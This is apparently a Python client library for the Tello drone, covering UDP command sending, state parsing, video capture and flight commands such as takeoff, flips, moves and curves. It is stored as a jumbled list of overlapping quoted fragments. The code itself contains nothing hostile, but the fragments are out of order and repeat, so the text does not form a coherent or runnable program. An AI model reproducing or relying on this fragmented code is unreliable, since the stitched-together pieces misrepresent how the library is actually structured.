video (bool): receive video", "self.receive_thread.start() def __del__(self): \"\"\"Closes the local socket.\"\"\" self.socket.close() def _receive_thread(self):", "if self.send_command('command') != 'ok': raise RuntimeError('Tello rejected the attempt to", "return: 'ok' or 'error' \"\"\" return self.send_command('emergency') def move_up(self, x,", "= time.time() while self.response_client.empty(): if time.time() - st >= self.command_timeout:", "machine for receiving command response. command_timeout (float): seconds to wait", "500] param with_return: bool return: 'ok' or 'error' \"\"\" return", "x, with_return=False): \"\"\" param x: int, [1, 3600] param with_return:", "flip_left(self, with_return=False): \"\"\" param with_return: bool return: 'ok' or 'error'", "None def read_frame(self): if self.video_client is None: raise RuntimeError('Video is", "(x1, y1, z1), (x2, y2, z2) with speed param x1,", "self.get('time?') def get_relative_height(self): \"\"\" return: int, [10, 3000] \"\"\" return", "with_return: bool return: 'ok' or 'error' \"\"\" return self.send_command('back {}'.format(x),", "return self.response.empty() def pop(self): return self.response.pop() class Video(object): def __init__(self,", "self.video_client is None: raise RuntimeError('Video is not available') while self.video_client.empty():", "'error' \"\"\" return self.send_command('left {}'.format(x), with_return) def move_right(self, x, with_return=False):", "return frame class Tello(object): def __init__(self, local_port=9999, command_timeout=0.35, state=True, video=True):", "curve defined by (0, 0, 0), (x1, y1, z1), (x2,", "100] param rotate_velocity: int, [-100, 100] param with_return: bool return:", "stream. \"\"\" self.command_timeout = command_timeout self.response_client = Client(local_port, 1024, True,", "self.get('attitude?', split=True) def get_absolute_height(self): \"\"\" return: int \"\"\" return self.get('baro?')", "Tello') self.frame = None self.lock = threading.RLock() self.thread = threading.Thread(target=self._update_thread)", "data): with self.lock: self.response = {item.split(':')[0]:float(item.split(':')[1]) for item in data.decode('utf-8').split(';')", "def __init__(self): super(State, self).__init__() self.response = {} self.lock = threading.RLock()", "response of command. state (bool): receive state from Tello? 
video", "def rotate_counter_clockwise(self, x, with_return=False): \"\"\" param x: int, [1, 3600]", "[-100, 100] param rotate_velocity: int, [-100, 100] param with_return: bool", "self.video.read() if ok: with self.lock: self.frame = frame def empty(self):", "bool return: 'ok' or 'error' \"\"\" return self.send_command('rc {} {}", "self.get('battery?') def get_flight_time(self): \"\"\" return: int \"\"\" return self.get('time?') def", "\"\"\" return: int, [10, 3000] \"\"\" return self.get('height?') def get_temperature(self):", "\"\"\" return self.get('speed?') def get_battery(self): \"\"\" return: int, [0, 100]", "class Response(object): def __init__(self): pass def recv(self, data): pass def", "'ok' or 'error' \"\"\" return self.send_command('right {}'.format(x), with_return) def move_forward(self,", "\"\"\" return self.send_command('back {}'.format(x), with_return) def rotate_clockwise(self, x, with_return=False): \"\"\"", "0, 0), (x1, y1, z1), (x2, y2, z2) with speed", "= Client(local_port, 1024, True, Command()) self.state_client = Client(8890, 1024, True,", "State(Response): def __init__(self): super(State, self).__init__() self.response = {} self.lock =", "':' in item} def pop(self): return self.response def empty(self): return", "empty(self): return self.response.empty() def pop(self): return self.response.pop() class Video(object): def", "self.response.pop() class Video(object): def __init__(self, daemon=True): self.video = cv2.VideoCapture('udp://@0.0.0.0:11111') if", "or 'error' \"\"\" return self.send_command('flip r', with_return) def flip_forward(self, with_return=False):", "{}'.format(left_right_velocity, forward_backward_velocity, up_down_velocity, rotate_velocity), with_return) def get(self, command, split=False): \"\"\"", "If the Tello rejects the attempt to enter command mode", "with_return=True): \"\"\"Sends a command to the Tello and waits for", "'error' \"\"\" return self.send_command('land') def open_video_stream(self): if self.send_command('streamon') != 'ok':", "'ok' or 'error' \"\"\" return self.send_command('flip f', with_return) def flip_backward(self,", "'ok' or 'error' \"\"\" return self.send_command('flip l', with_return) def flip_right(self,", "__init__(self): pass def recv(self, data): pass def pop(self): pass def", "def get_speed(self): \"\"\" return: int, [10, 100] \"\"\" return self.get('speed?')", "before a response is received, a RuntimeError exception is raised.", "responses from the Tello. Runs as a thread, sets self.response", "exceeded before a response is received, a RuntimeError exception is", "or open the video stream. 
\"\"\" self.command_timeout = command_timeout self.response_client", "return self.send_command('ccw {}'.format(x), with_return) def flip_left(self, with_return=False): \"\"\" param with_return:", "return: 'ok' or 'error' \"\"\" return self.send_command('go {} {} {}", "500] param speed: int, [10-60] param with_return: bool return: 'ok'", "or list(int) \"\"\" result = self.send_command(command) if split: return [int(x)", "in result.split(' ')] else: return int(result) def get_speed(self): \"\"\" return:", "with_return) def flip_right(self, with_return=False): \"\"\" param with_return: bool return: 'ok'", "if ok: with self.lock: self.frame = frame def empty(self): with", "def move_down(self, x, with_return=False): \"\"\" param x: int, [20, 500]", "')] else: return int(result) def get_speed(self): \"\"\" return: int, [10,", "\"\"\" return self.get('attitude?', split=True) def get_absolute_height(self): \"\"\" return: int \"\"\"", "self.frame = self.frame, None return frame class Tello(object): def __init__(self,", "Client(local_port, 1024, True, Command()) self.state_client = Client(8890, 1024, True, State())", "with_return=False): \"\"\" param x: int, [1, 3600] param with_return: bool", "self.response = data.decode('utf-8') def pop(self): with self.lock: response, self.response =", "int, [10, 400]; 6553: out of bounds \"\"\" return self.get('tof?')", "= threading.RLock() self.thread = threading.Thread(target=self._update_thread) self.thread.daemon = daemon self.thread.start() def", "def move_right(self, x, with_return=False): \"\"\" param x: int, [20, 500]", "rotate_velocity), with_return) def get(self, command, split=False): \"\"\" param command param", "return: 'ok' or 'error' \"\"\" return self.send_command('up {}'.format(x), with_return) def", "if self.state_client else None def read_frame(self): if self.video_client is None:", "local_port (int): port of local machine for receiving command response.", "(bool): receive state from Tello? video (bool): receive video from", "a response of command. state (bool): receive state from Tello?", "def __del__(self): self.video.release() def _update_thread(self): while True: ok, frame =", "data.decode('utf-8') def pop(self): with self.lock: response, self.response = self.response, None", "whatever the Tello last returned. 
\"\"\" while True: try: self.response.recv(self.socket.recv(self.buffer_size))", "__init__(self, local_port=9999, command_timeout=0.35, state=True, video=True): \"\"\"Connects to Tello in command", "with_return) def move_backward(self, x, with_return=False): \"\"\" param x: int, [20,", "to Tello') self.frame = None self.lock = threading.RLock() self.thread =", "y1, z1, x2, y2, z2, speed), with_return) def set_speed(self, speed,", "self.get('speed?') def get_battery(self): \"\"\" return: int, [0, 100] \"\"\" return", "Response(object): def __init__(self): pass def recv(self, data): pass def pop(self):", "int, [-500, 500] param z1, z2: int, [-500, 500] param", "[-500, 500] param speed: int, [10-60] param with_return: bool return:", "while self.video_client.empty(): pass return self.video_client.pop() def enter_command_mode(self): if self.send_command('command') !=", "self.lock = threading.RLock() def recv(self, data): with self.lock: self.response =", "self.response.empty() def pop(self): return self.response.pop() class Video(object): def __init__(self, daemon=True):", "\"\"\"Sends a command to the Tello and waits for a", "{} self.lock = threading.RLock() def recv(self, data): with self.lock: self.response", "command, split=False): \"\"\" param command param split: bool, multiple values?", "time.time() while self.response_client.empty(): if time.time() - st >= self.command_timeout: raise", "def goto(self, x, y, z, speed, with_return=False): \"\"\" param x:", "self.get('acceleration?', split=True) def get_tof_height(self): \"\"\" return: int, [10, 400]; 6553:", "{} {} {} {}'.format(x, y, z, speed), with_return) def goto_curve(self,", "int, [10, 100] \"\"\" return self.get('speed?') def get_battery(self): \"\"\" return:", "item in data.decode('utf-8').split(';') if ':' in item} def pop(self): return", "self.send_command('ccw {}'.format(x), with_return) def flip_left(self, with_return=False): \"\"\" param with_return: bool", "3000] \"\"\" return self.get('height?') def get_temperature(self): \"\"\" return: int, [0,", "the Tello last returned. \"\"\" while True: try: self.response.recv(self.socket.recv(self.buffer_size)) except", "'error' \"\"\" return self.send_command('flip f', with_return) def flip_backward(self, with_return=False): \"\"\"", "return: 'ok' or 'error' \"\"\" return self.send_command('flip b', with_return) def", "\"\"\" return: 'ok' or 'error' \"\"\" return self.send_command('streamoff') def emergency_shutdown(self):", "command. state (bool): receive state from Tello? video (bool): receive", "import time import socket import threading class Response(object): def __init__(self):", "get_speed(self): \"\"\" return: int, [10, 100] \"\"\" return self.get('speed?') def", "Tello(object): def __init__(self, local_port=9999, command_timeout=0.35, state=True, video=True): \"\"\"Connects to Tello", "_receive_thread(self): \"\"\"Listens for responses from the Tello. 
Runs as a", "500] param z: int, [20, 500] param speed: int, [10-100]", "int, [0, 90] \"\"\" return self.get('temp?') def get_imu_pose(self): \"\"\"[pitch, roll,", "int \"\"\" return self.get('baro?') def get_imu_acceleration(self): \"\"\" return: list(int) \"\"\"", "RuntimeError: If the Tello rejects the attempt to enter command", "'error' \"\"\" return self.send_command('forward {}'.format(x), with_return) def move_backward(self, x, with_return=False):", "with_return) def flip_left(self, with_return=False): \"\"\" param with_return: bool return: 'ok'", "return: list(int) \"\"\" return self.get('acceleration?', split=True) def get_tof_height(self): \"\"\" return:", "data.decode('utf-8').split(';') if ':' in item} def pop(self): return self.response def", "return self.send_command('curve {} {} {} {} {} {} {}'.format(x1, y1,", "bool return: 'ok' or 'error' \"\"\" return self.send_command('cw {}'.format(x), with_return)", "local_port)) self.receive_thread = threading.Thread(target=self._receive_thread) self.receive_thread.daemon = daemon self.receive_thread.start() def __del__(self):", "[10, 100] \"\"\" return self.get('speed?') def get_battery(self): \"\"\" return: int,", "for responses from the Tello. Runs as a thread, sets", "return self.send_command('takeoff') def land(self): \"\"\" return: 'ok' or 'error' \"\"\"", "rotate_velocity, with_return=False): \"\"\" param left_right_velocity: int, [-100, 100] param forward_backward_velocity:", "else None self.tello_address = ('192.168.10.1', 8889) self.enter_command_mode() self.video_client = None", "the video stream') def close_video_stream(self): \"\"\" return: 'ok' or 'error'", "with_return) def goto(self, x, y, z, speed, with_return=False): \"\"\" param", "'ok' or 'error' \"\"\" return self.send_command('curve {} {} {} {}", "seconds to wait for a response of command. state (bool):", "\"\"\" return: int, [10, 100] \"\"\" return self.get('speed?') def get_battery(self):", "return self.get('speed?') def get_battery(self): \"\"\" return: int, [0, 100] \"\"\"", "raise RuntimeError('Tello rejected the attempt to enter command mode') def", "RuntimeError('Video is not available') while self.video_client.empty(): pass return self.video_client.pop() def", "self.response_client.empty(): if time.time() - st >= self.command_timeout: raise RuntimeError('No response", "bool return: 'ok' or 'error' \"\"\" return self.send_command('forward {}'.format(x), with_return)", "[-500, 500] param z1, z2: int, [-500, 500] param speed:", "class Video(object): def __init__(self, daemon=True): self.video = cv2.VideoCapture('udp://@0.0.0.0:11111') if not", "param x: int, [20, 500] param y: int, [20, 500]", "[-179, 179], [-179, 179]] \"\"\" return self.get('attitude?', split=True) def get_absolute_height(self):", "x: int, [20, 500] param with_return: bool return: 'ok' or", "Command to send. Returns: str: Response from Tello. Raises: RuntimeError:", "command_timeout self.response_client = Client(local_port, 1024, True, Command()) self.state_client = Client(8890,", "and waits for a response. If self.command_timeout is exceeded before", "int, [10-100] param with_return: bool return: 'ok' or 'error' \"\"\"", "self.send_command('curve {} {} {} {} {} {} {}'.format(x1, y1, z1,", "from Tello? 
Raises: RuntimeError: If the Tello rejects the attempt", "or 'error' \"\"\" return self.send_command('speed {}'.format(speed), with_return) def set_remote_controller_command(self, left_right_velocity,", "int, [-100, 100] param rotate_velocity: int, [-100, 100] param with_return:", "Runs as a thread, sets self.response to whatever the Tello", "or 'error' \"\"\" return self.send_command('rc {} {} {} {}'.format(left_right_velocity, forward_backward_velocity,", "with_return=False): \"\"\"fly a curve defined by (0, 0, 0), (x1,", "or 'error' \"\"\" return self.send_command('flip l', with_return) def flip_right(self, with_return=False):", "Tello and waits for a response. If self.command_timeout is exceeded", "get_tof_height(self): \"\"\" return: int, [10, 400]; 6553: out of bounds", "with_return=False): \"\"\" param x: int, [20, 500] param y: int,", "pop(self): return self.response def empty(self): return False class Client(object): def", "100] param with_return: bool return: 'ok' or 'error' \"\"\" return", "None return frame class Tello(object): def __init__(self, local_port=9999, command_timeout=0.35, state=True,", "\"\"\" param left_right_velocity: int, [-100, 100] param forward_backward_velocity: int, [-100,", "[[-89, 89], [-179, 179], [-179, 179]] \"\"\" return self.get('attitude?', split=True)", "to enter command mode') def take_off(self): \"\"\" return: 'ok' or", "[10-100] param with_return: bool return: 'ok' or 'error' \"\"\" return", "(int): port of local machine for receiving command response. command_timeout", "return: 'ok' or 'error' \"\"\" return self.send_command('rc {} {} {}", "\"\"\"Listens for responses from the Tello. Runs as a thread,", "x2: int, [-500, 500] param y1, y2: int, [-500, 500]", "int, [10, 3000] \"\"\" return self.get('height?') def get_temperature(self): \"\"\" return:", "False class Client(object): def __init__(self, local_port, buffer_size, daemon, response): self.response", "RuntimeError('Tello rejected the attempt to enter command mode') def take_off(self):", "with_return: bool return: 'ok' or 'error' \"\"\" return self.send_command('flip f',", "with_return: bool return: 'ok' or 'error' \"\"\" return self.send_command('curve {}", "def __init__(self): super(Command, self).__init__() self.response = None self.lock = threading.RLock()", "param rotate_velocity: int, [-100, 100] param with_return: bool return: 'ok'", "list(int) \"\"\" return self.get('acceleration?', split=True) def get_tof_height(self): \"\"\" return: int,", "or 'error' \"\"\" return self.send_command('go {} {} {} {}'.format(x, y,", "'ok' or 'error' \"\"\" return self.send_command('land') def open_video_stream(self): if self.send_command('streamon')", "speed), with_return) def set_speed(self, speed, with_return=False): \"\"\" param speed: int,", "self.state_client else None def read_frame(self): if self.video_client is None: raise", "return self.get('baro?') def get_imu_acceleration(self): \"\"\" return: list(int) \"\"\" return self.get('acceleration?',", "= None self.lock = threading.RLock() self.thread = threading.Thread(target=self._update_thread) self.thread.daemon =", "self.response to whatever the Tello last returned. 
\"\"\" while True:", "self.thread = threading.Thread(target=self._update_thread) self.thread.daemon = daemon self.thread.start() def __del__(self): self.video.release()", "None def pop(self): with self.lock: frame, self.frame = self.frame, None", "attempt to enter command mode') def take_off(self): \"\"\" return: 'ok'", "[-100, 100] param up_down_velocity: int, [-100, 100] param rotate_velocity: int,", "Command(Response): def __init__(self): super(Command, self).__init__() self.response = None self.lock =", "sets self.response to whatever the Tello last returned. \"\"\" while", "move_up(self, x, with_return=False): \"\"\" param x: int, [20, 500] param", "\"\"\" return self.get('battery?') def get_flight_time(self): \"\"\" return: int \"\"\" return", "or 'error' \"\"\" return self.send_command('down {}'.format(x), with_return) def move_left(self, x,", "{}'.format(x), with_return) def move_left(self, x, with_return=False): \"\"\" param x: int,", "within self.timeout seconds. \"\"\" self.response_client.pop() self.response_client.socket.sendto(command.encode('utf-8'), self.tello_address) if not with_return:", "'error' \"\"\" return self.send_command('takeoff') def land(self): \"\"\" return: 'ok' or", "param with_return: bool return: 'ok' or 'error' \"\"\" return self.send_command('forward", "Client(8890, 1024, True, State()) if state else None self.tello_address =", "with_return: bool return: 'ok' or 'error' \"\"\" return self.send_command('rc {}", "with_return) def rotate_counter_clockwise(self, x, with_return=False): \"\"\" param x: int, [1,", "with_return=False): \"\"\" param with_return: bool return: 'ok' or 'error' \"\"\"", "int, [20, 500] param speed: int, [10-100] param with_return: bool", "super(State, self).__init__() self.response = {} self.lock = threading.RLock() def recv(self,", "'ok': raise RuntimeError('Tello rejected the attempt to enter command mode')", "'error' \"\"\" return self.send_command('down {}'.format(x), with_return) def move_left(self, x, with_return=False):", "command mode. Args: local_port (int): port of local machine for", "if time.time() - st >= self.command_timeout: raise RuntimeError('No response to", "'error' \"\"\" return self.send_command('back {}'.format(x), with_return) def rotate_clockwise(self, x, with_return=False):", "forward_backward_velocity, up_down_velocity, rotate_velocity), with_return) def get(self, command, split=False): \"\"\" param", "split: bool, multiple values? return: int or list(int) \"\"\" result", "ok: with self.lock: self.frame = frame def empty(self): with self.lock:", "response is received, a RuntimeError exception is raised. 
Args: command", "179], [-179, 179]] \"\"\" return self.get('attitude?', split=True) def get_absolute_height(self): \"\"\"", "return: 'ok' or 'error' \"\"\" return self.send_command('ccw {}'.format(x), with_return) def", "self.thread.daemon = daemon self.thread.start() def __del__(self): self.video.release() def _update_thread(self): while", "89], [-179, 179], [-179, 179]] \"\"\" return self.get('attitude?', split=True) def", "\"\"\" while True: try: self.response.recv(self.socket.recv(self.buffer_size)) except Exception as e: print(e)", "self.enter_command_mode() self.video_client = None if video: self.open_video_stream() self.video_client = Video(True)", "return [int(x) for x in result.split(' ')] else: return int(result)", "time import socket import threading class Response(object): def __init__(self): pass", "socket.SOCK_DGRAM) self.socket.bind(('', local_port)) self.receive_thread = threading.Thread(target=self._receive_thread) self.receive_thread.daemon = daemon self.receive_thread.start()", "3600] param with_return: bool return: 'ok' or 'error' \"\"\" return", "return self.get('battery?') def get_flight_time(self): \"\"\" return: int \"\"\" return self.get('time?')", "return self.response_client.pop() def state(self): return self.state_client.pop() if self.state_client else None", "with self.lock: return self.frame is None def pop(self): with self.lock:", "self.lock: response, self.response = self.response, None return response def empty(self):", "result = self.send_command(command) if split: return [int(x) for x in", "command mode') def take_off(self): \"\"\" return: 'ok' or 'error' \"\"\"", "empty(self): with self.lock: return self.frame is None def pop(self): with", "send. Returns: str: Response from Tello. Raises: RuntimeError: If no", "response. command_timeout (float): seconds to wait for a response of", "'ok' or 'error' \"\"\" return self.send_command('emergency') def move_up(self, x, with_return=False):", "param split: bool, multiple values? return: int or list(int) \"\"\"", "import socket import threading class Response(object): def __init__(self): pass def", "self).__init__() self.response = {} self.lock = threading.RLock() def recv(self, data):", "'ok': raise RuntimeError('Tello rejected to open the video stream') def", "with_return: bool return: 'ok' or 'error' \"\"\" return self.send_command('right {}'.format(x),", "get_relative_height(self): \"\"\" return: int, [10, 3000] \"\"\" return self.get('height?') def", "with_return: bool return: 'ok' or 'error' \"\"\" return self.send_command('cw {}'.format(x),", "with_return) def move_left(self, x, with_return=False): \"\"\" param x: int, [20,", "'error' \"\"\" return self.send_command('flip l', with_return) def flip_right(self, with_return=False): \"\"\"", "or 'error' \"\"\" return self.send_command('forward {}'.format(x), with_return) def move_backward(self, x,", "x, with_return=False): \"\"\" param x: int, [20, 500] param with_return:", "l', with_return) def flip_right(self, with_return=False): \"\"\" param with_return: bool return:", "- st >= self.command_timeout: raise RuntimeError('No response to command') return", "None: raise RuntimeError('Video is not available') while self.video_client.empty(): pass return", "return: 'ok' or 'error' \"\"\" return self.send_command('left {}'.format(x), with_return) def", "set_speed(self, speed, with_return=False): \"\"\" param speed: int, [10-100] param with_return:", "no response is received within self.timeout seconds. 
\"\"\" self.response_client.pop() self.response_client.socket.sendto(command.encode('utf-8'),", "return: 'ok' or 'error' \"\"\" return self.send_command('forward {}'.format(x), with_return) def", "return self.video_client.pop() def enter_command_mode(self): if self.send_command('command') != 'ok': raise RuntimeError('Tello", "{} {} {}'.format(x1, y1, z1, x2, y2, z2, speed), with_return)", "return self.send_command('speed {}'.format(speed), with_return) def set_remote_controller_command(self, left_right_velocity, forward_backward_velocity, up_down_velocity, rotate_velocity,", "the attempt to enter command mode') def take_off(self): \"\"\" return:", "def recv(self, data): pass def pop(self): pass def empty(self): pass", "def move_backward(self, x, with_return=False): \"\"\" param x: int, [20, 500]", "pop(self): with self.lock: response, self.response = self.response, None return response", "move_forward(self, x, with_return=False): \"\"\" param x: int, [20, 500] param", "command_timeout=0.35, state=True, video=True): \"\"\"Connects to Tello in command mode. Args:", "param with_return: bool return: 'ok' or 'error' \"\"\" return self.send_command('curve", "while True: try: self.response.recv(self.socket.recv(self.buffer_size)) except Exception as e: print(e) break", "return self.get('attitude?', split=True) def get_absolute_height(self): \"\"\" return: int \"\"\" return", "class State(Response): def __init__(self): super(State, self).__init__() self.response = {} self.lock", "return self.send_command('land') def open_video_stream(self): if self.send_command('streamon') != 'ok': raise RuntimeError('Tello", "command_timeout (float): seconds to wait for a response of command.", "self.send_command('flip r', with_return) def flip_forward(self, with_return=False): \"\"\" param with_return: bool", "True, Command()) self.state_client = Client(8890, 1024, True, State()) if state", "y, z, speed), with_return) def goto_curve(self, x1, y1, z1, x2,", "threading.RLock() def recv(self, data): with self.lock: self.response = {item.split(':')[0]:float(item.split(':')[1]) for", "{}'.format(x), with_return) def flip_left(self, with_return=False): \"\"\" param with_return: bool return:", "with_return) def move_forward(self, x, with_return=False): \"\"\" param x: int, [20,", "'ok' or 'error' \"\"\" return self.send_command('go {} {} {} {}'.format(x,", "True: ok, frame = self.video.read() if ok: with self.lock: self.frame", "raise RuntimeError('Video is not available') while self.video_client.empty(): pass return self.video_client.pop()", "def empty(self): return self.response.empty() def pop(self): return self.response.pop() class Video(object):", "500] param z1, z2: int, [-500, 500] param speed: int,", "param up_down_velocity: int, [-100, 100] param rotate_velocity: int, [-100, 100]", "{}'.format(x, y, z, speed), with_return) def goto_curve(self, x1, y1, z1,", "100] \"\"\" return self.get('battery?') def get_flight_time(self): \"\"\" return: int \"\"\"", "None if video: self.open_video_stream() self.video_client = Video(True) def send_command(self, command,", "param with_return: bool return: 'ok' or 'error' \"\"\" return self.send_command('right", "bool return: 'ok' or 'error' \"\"\" return self.send_command('flip f', with_return)", "def goto_curve(self, x1, y1, z1, x2, y2, z2, speed, with_return=False):", "= cv2.VideoCapture('udp://@0.0.0.0:11111') if not self.video.isOpened(): raise RuntimeError('Failed to connect to", "ok, frame = self.video.read() if ok: with self.lock: self.frame =", "the Tello rejects the 
attempt to enter command mode or", "self.frame, None return frame class Tello(object): def __init__(self, local_port=9999, command_timeout=0.35,", "defined by (0, 0, 0), (x1, y1, z1), (x2, y2,", "socket.\"\"\" self.socket.close() def _receive_thread(self): \"\"\"Listens for responses from the Tello.", "self.response = {item.split(':')[0]:float(item.split(':')[1]) for item in data.decode('utf-8').split(';') if ':' in", "from Tello. Raises: RuntimeError: If no response is received within", "x2, y2, z2, speed, with_return=False): \"\"\"fly a curve defined by", "def recv(self, data): with self.lock: self.response = {item.split(':')[0]:float(item.split(':')[1]) for item", "empty(self): with self.lock: return self.response is None class State(Response): def", "frame def empty(self): with self.lock: return self.frame is None def", "speed), with_return) def goto_curve(self, x1, y1, z1, x2, y2, z2,", "int, [-500, 500] param y1, y2: int, [-500, 500] param", "super(Command, self).__init__() self.response = None self.lock = threading.RLock() def recv(self,", "'error' \"\"\" return self.send_command('go {} {} {} {}'.format(x, y, z,", "Video(object): def __init__(self, daemon=True): self.video = cv2.VideoCapture('udp://@0.0.0.0:11111') if not self.video.isOpened():", "bool return: 'ok' or 'error' \"\"\" return self.send_command('speed {}'.format(speed), with_return)", "= Client(8890, 1024, True, State()) if state else None self.tello_address", "def open_video_stream(self): if self.send_command('streamon') != 'ok': raise RuntimeError('Tello rejected to", "emergency_shutdown(self): \"\"\" return: 'ok' or 'error' \"\"\" return self.send_command('emergency') def", "{}'.format(x), with_return) def move_down(self, x, with_return=False): \"\"\" param x: int,", "None self.lock = threading.RLock() def recv(self, data): with self.lock: self.response", "move_left(self, x, with_return=False): \"\"\" param x: int, [20, 500] param", "if self.video_client is None: raise RuntimeError('Video is not available') while", "or 'error' \"\"\" return self.send_command('back {}'.format(x), with_return) def rotate_clockwise(self, x,", "'ok' or 'error' \"\"\" return self.send_command('speed {}'.format(speed), with_return) def set_remote_controller_command(self,", "return: int, [0, 100] \"\"\" return self.get('battery?') def get_flight_time(self): \"\"\"", "self.frame = None self.lock = threading.RLock() self.thread = threading.Thread(target=self._update_thread) self.thread.daemon", "with_return=False): \"\"\" param left_right_velocity: int, [-100, 100] param forward_backward_velocity: int,", "def __init__(self, local_port=9999, command_timeout=0.35, state=True, video=True): \"\"\"Connects to Tello in", "thread, sets self.response to whatever the Tello last returned. 
\"\"\"", "y1, z1), (x2, y2, z2) with speed param x1, x2:", "get_temperature(self): \"\"\" return: int, [0, 90] \"\"\" return self.get('temp?') def", "self.response_client = Client(local_port, 1024, True, Command()) self.state_client = Client(8890, 1024,", "int, [0, 100] \"\"\" return self.get('battery?') def get_flight_time(self): \"\"\" return:", "daemon self.receive_thread.start() def __del__(self): \"\"\"Closes the local socket.\"\"\" self.socket.close() def", "= self.video.read() if ok: with self.lock: self.frame = frame def", "return: list(int), [[-89, 89], [-179, 179], [-179, 179]] \"\"\" return", "self.response_client.pop() self.response_client.socket.sendto(command.encode('utf-8'), self.tello_address) if not with_return: return st = time.time()", "while self.response_client.empty(): if time.time() - st >= self.command_timeout: raise RuntimeError('No", "def flip_left(self, with_return=False): \"\"\" param with_return: bool return: 'ok' or", "forward_backward_velocity: int, [-100, 100] param up_down_velocity: int, [-100, 100] param", "return self.send_command('cw {}'.format(x), with_return) def rotate_counter_clockwise(self, x, with_return=False): \"\"\" param", "or 'error' \"\"\" return self.send_command('emergency') def move_up(self, x, with_return=False): \"\"\"", "[10, 3000] \"\"\" return self.get('height?') def get_temperature(self): \"\"\" return: int,", "'error' \"\"\" return self.send_command('right {}'.format(x), with_return) def move_forward(self, x, with_return=False):", "\"\"\" return self.send_command('speed {}'.format(speed), with_return) def set_remote_controller_command(self, left_right_velocity, forward_backward_velocity, up_down_velocity,", "y2, z2) with speed param x1, x2: int, [-500, 500]", "def empty(self): with self.lock: return self.response is None class State(Response):", "rotate_counter_clockwise(self, x, with_return=False): \"\"\" param x: int, [1, 3600] param", "return: 'ok' or 'error' \"\"\" return self.send_command('flip r', with_return) def", "\"\"\" return: 'ok' or 'error' \"\"\" return self.send_command('takeoff') def land(self):", "\"\"\"fly a curve defined by (0, 0, 0), (x1, y1,", "bool return: 'ok' or 'error' \"\"\" return self.send_command('go {} {}", "None class State(Response): def __init__(self): super(State, self).__init__() self.response = {}", "bool return: 'ok' or 'error' \"\"\" return self.send_command('right {}'.format(x), with_return)", "RuntimeError exception is raised. Args: command (str): Command to send.", "to the Tello and waits for a response. 
If self.command_timeout", "return self.get('time?') def get_relative_height(self): \"\"\" return: int, [10, 3000] \"\"\"", "True: try: self.response.recv(self.socket.recv(self.buffer_size)) except Exception as e: print(e) break def", "self.send_command('command') != 'ok': raise RuntimeError('Tello rejected the attempt to enter", "param with_return: bool return: 'ok' or 'error' \"\"\" return self.send_command('down", "\"\"\" param x: int, [1, 3600] param with_return: bool return:", "\"\"\" return: 'ok' or 'error' \"\"\" return self.send_command('land') def open_video_stream(self):", "def get_flight_time(self): \"\"\" return: int \"\"\" return self.get('time?') def get_relative_height(self):", "__init__(self): super(Command, self).__init__() self.response = None self.lock = threading.RLock() def", "self.send_command('up {}'.format(x), with_return) def move_down(self, x, with_return=False): \"\"\" param x:", "move_backward(self, x, with_return=False): \"\"\" param x: int, [20, 500] param", "rejected to open the video stream') def close_video_stream(self): \"\"\" return:", "forward_backward_velocity, up_down_velocity, rotate_velocity, with_return=False): \"\"\" param left_right_velocity: int, [-100, 100]", "\"\"\"Closes the local socket.\"\"\" self.socket.close() def _receive_thread(self): \"\"\"Listens for responses", "cv2.VideoCapture('udp://@0.0.0.0:11111') if not self.video.isOpened(): raise RuntimeError('Failed to connect to Tello')", "return self.send_command('left {}'.format(x), with_return) def move_right(self, x, with_return=False): \"\"\" param", "'ok' or 'error' \"\"\" return self.send_command('forward {}'.format(x), with_return) def move_backward(self,", "\"\"\" return self.send_command('right {}'.format(x), with_return) def move_forward(self, x, with_return=False): \"\"\"", "{} {} {}'.format(x, y, z, speed), with_return) def goto_curve(self, x1,", "split=False): \"\"\" param command param split: bool, multiple values? return:", "get_absolute_height(self): \"\"\" return: int \"\"\" return self.get('baro?') def get_imu_acceleration(self): \"\"\"", "self.send_command('cw {}'.format(x), with_return) def rotate_counter_clockwise(self, x, with_return=False): \"\"\" param x:", "is None def pop(self): with self.lock: frame, self.frame = self.frame,", "return: 'ok' or 'error' \"\"\" return self.send_command('cw {}'.format(x), with_return) def", "x: int, [1, 3600] param with_return: bool return: 'ok' or", "= daemon self.receive_thread.start() def __del__(self): \"\"\"Closes the local socket.\"\"\" self.socket.close()", "= Video(True) def send_command(self, command, with_return=True): \"\"\"Sends a command to", "self.send_command(command) if split: return [int(x) for x in result.split(' ')]", "with speed param x1, x2: int, [-500, 500] param y1,", "with_return: bool return: 'ok' or 'error' \"\"\" return self.send_command('down {}'.format(x),", "z2, speed), with_return) def set_speed(self, speed, with_return=False): \"\"\" param speed:", "self).__init__() self.response = None self.lock = threading.RLock() def recv(self, data):", "Tello last returned. 
\"\"\" while True: try: self.response.recv(self.socket.recv(self.buffer_size)) except Exception", "= threading.Thread(target=self._receive_thread) self.receive_thread.daemon = daemon self.receive_thread.start() def __del__(self): \"\"\"Closes the", "threading.Thread(target=self._receive_thread) self.receive_thread.daemon = daemon self.receive_thread.start() def __del__(self): \"\"\"Closes the local", "st = time.time() while self.response_client.empty(): if time.time() - st >=", "def rotate_clockwise(self, x, with_return=False): \"\"\" param x: int, [1, 3600]", "bool return: 'ok' or 'error' \"\"\" return self.send_command('flip l', with_return)", "179]] \"\"\" return self.get('attitude?', split=True) def get_absolute_height(self): \"\"\" return: int", "with_return: bool return: 'ok' or 'error' \"\"\" return self.send_command('flip r',", "'ok' or 'error' \"\"\" return self.send_command('back {}'.format(x), with_return) def rotate_clockwise(self,", "enter command mode') def take_off(self): \"\"\" return: 'ok' or 'error'", "return self.get('height?') def get_temperature(self): \"\"\" return: int, [0, 90] \"\"\"", "param x: int, [20, 500] param with_return: bool return: 'ok'", "print(e) break def empty(self): return self.response.empty() def pop(self): return self.response.pop()", "connect to Tello') self.frame = None self.lock = threading.RLock() self.thread", "def move_up(self, x, with_return=False): \"\"\" param x: int, [20, 500]", "y: int, [20, 500] param z: int, [20, 500] param", "return: int, [10, 400]; 6553: out of bounds \"\"\" return", "def recv(self, data): with self.lock: self.response = data.decode('utf-8') def pop(self):", "'error' \"\"\" return self.send_command('rc {} {} {} {}'.format(left_right_velocity, forward_backward_velocity, up_down_velocity,", "'error' \"\"\" return self.send_command('flip r', with_return) def flip_forward(self, with_return=False): \"\"\"", "RuntimeError('Failed to connect to Tello') self.frame = None self.lock =", "def send_command(self, command, with_return=True): \"\"\"Sends a command to the Tello", "z: int, [20, 500] param speed: int, [10-100] param with_return:", "speed, with_return=False): \"\"\" param speed: int, [10-100] param with_return: bool", "for a response of command. 
